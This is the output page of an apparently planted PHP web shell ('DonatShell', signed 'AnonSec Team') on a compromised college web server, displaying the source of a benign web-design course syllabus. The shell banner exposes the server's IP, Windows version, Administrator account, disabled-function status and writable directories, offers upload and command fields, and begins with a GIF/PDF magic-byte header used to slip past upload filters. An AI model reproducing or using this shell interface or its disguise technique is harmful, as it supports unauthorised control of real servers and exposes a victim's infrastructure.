GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1144/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Syllabus.php
<?
// CST1025/Syllabus.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true;
include('application.phpinc');
include('Course/courseInfo.phpinc');
include('classInfo.phpinc');
$title = "Syllabus";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
include('common/pageHeader.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
include('common/sectionHeader.phpinc');
?>
<p>

<fieldset><legend>Description</legend>
This course is designed to give students advanced skills in designing a web site. Students are instructed in how to effectively use a HTML/Web site authoring tool. The use of HTML coding, browser differences, page layout, tables, graphics, image mapping, linking, and using Flash objects are covered. Advanced topics covered include dynamically created pages using PHP. Students will manage their projects on an actual web server.
<br>
(Prerequisites: MMDT1142, MMDT1058 and MMDT1021) (3 Credits)
</fieldset>

<fieldset><legend>Objectives</legend>
<ol class="obj">
	<li>Evaluate and choose a domain name.</li>
	<li>Register a domain name.</li>
	<li>Evaluate web hosting companies and choose a hosting package.</li>
	<li>Navigate through the directory structures of a remote host and the local machine.</li>
	<li>Publish web content to a host.</li>
	<li>Review HTML concepts.</li>
	<li>Review web graphic concepts.</li>
	<li>Test pages in multiple browsers on multiple platforms.</li>
	<li>Use an image map as a navigation menu.</li>
	<li>Discover the problems incurred when using Flash for navigation.</li>
	<li>Use tables to set page layout.</li>
	<li>Use divs to set page layout.</li>
	<li>Demonstrate static and liquid layouts.</li>
	<li>Use image slicing with tables to create a rollover menu.</li>
	<li>Embed audio into a web page.</li>
	<li>Embed video into a web page.</li>
	<li>Use CSS to style page elements.</li>
	<li>Use layers to set page layout.</li>
	<li>Create forms to pass data to a server side script.</li>
	<li>Consider web accessibility guidelines.</li>
	<li>Create an entire website from concept to finished product.</li>
</ol>
</fieldset>

<? 
include('ReferencesResources.phpinc');
?>

<fieldset><legend>Requirements</legend>
An average student will spend <?=$class['totalHours']?> hours performing course tasks: 
<? if ($class['lectureHours'] != 0) { ?><?=$class['lectureHours']?> hours of lecture<?=$lectureHoursPunctuation?><? } ?>
<? if ($class['labHours'] != 0) { ?><?=$class['labHours']?> hours working on assigned tasks in the lab<?=$labHoursPunctuation?><? } ?>
<? if ($class['lectureHours'] == 0 && $class['labHours'] == 0) { ?>No class hours, <? } ?>
<? if ($class['outsideHours'] != 0) { ?><?=$class['outsideHours']?> hours out-of-class<? } ?>
. Factual information is provided through informal presentation or in a personalized format. The student is expected to contact the instructor if difficulty is encountered or help is needed.
<? if ($class['lectureHours'] != 0 || $class['labHours'] != 0) { ?> Attendance is critical for completion of the lab credits.<? } ?>
</fieldset>

<fieldset><legend>Grading</legend>
Assignment and quiz grades are totaled and translated to a percentage and the percentages to grades. A score of 70% is passing. The following percentage distribution guarantees the following grade: A:93%+, A-:90%+, B+:87%+, B:83%+, B-:80%+, C+:77%+, C:73%+, C-:70%+, F:&lt;70%.
</fieldset>

</p>
<?
include('Course/DisabilityNotice.phpinc');
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team